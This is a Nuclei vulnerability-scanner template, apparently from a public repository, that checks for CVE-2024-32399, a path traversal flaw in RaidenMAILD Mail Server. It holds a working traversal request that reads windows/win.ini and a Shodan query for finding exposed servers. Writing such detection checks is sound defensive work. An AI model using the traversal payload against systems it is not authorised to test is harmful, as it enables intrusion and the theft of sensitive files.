39 lines
1.4 KiB
YAML
39 lines
1.4 KiB
YAML
id: CVE-2024-32399
|
|
|
|
info:
|
|
name: RaidenMAILD Mail Server v.4.9.4 - Path Traversal
|
|
author: DhiyaneshDK
|
|
severity: high
|
|
description: |
|
|
Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4 and before allows a remote attacker to obtain sensitive information via the /webeditor/ component.
|
|
reference:
|
|
- https://owasp.org/www-community/attacks/Path_Traversal
|
|
- https://github.com/NN0b0dy/CVE-2024-32399/blob/main/README.md
|
|
- https://github.com/NN0b0dy/c01/blob/main/01.pdf
|
|
- https://github.com/NN0b0dy/CVE-2024-32399
|
|
- https://github.com/nomi-sec/PoC-in-GitHub
|
|
classification:
|
|
epss-score: 0.00053
|
|
epss-percentile: 0.21091
|
|
cpe: cpe:2.3:a:raidenmaild:raidenmaild:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
shodan-query: html:"RaidenMAILD"
|
|
product: raidenmaild
|
|
vendor: raidenmaild
|
|
tags: cve,cve2024,lfi,raiden,mail,server
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/webeditor/../../../windows/win.ini"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains_all(body, "[fonts]", "for 16-bit app support")'
|
|
- 'contains(header, "application/octet-stream")'
|
|
- 'status_code == 200'
|
|
condition: and
|
|
# digest: 4a0a004730450221009837f7c8a05221d04e9b80eedc922e24df2d1cb6a875bddff0082602be0b6772022049e3909c5485e4637cf3ab3effb56b031d1435f172e4a741b6e1c41dcee98d8d:922c64590222798bb761d5b6d8e72950 |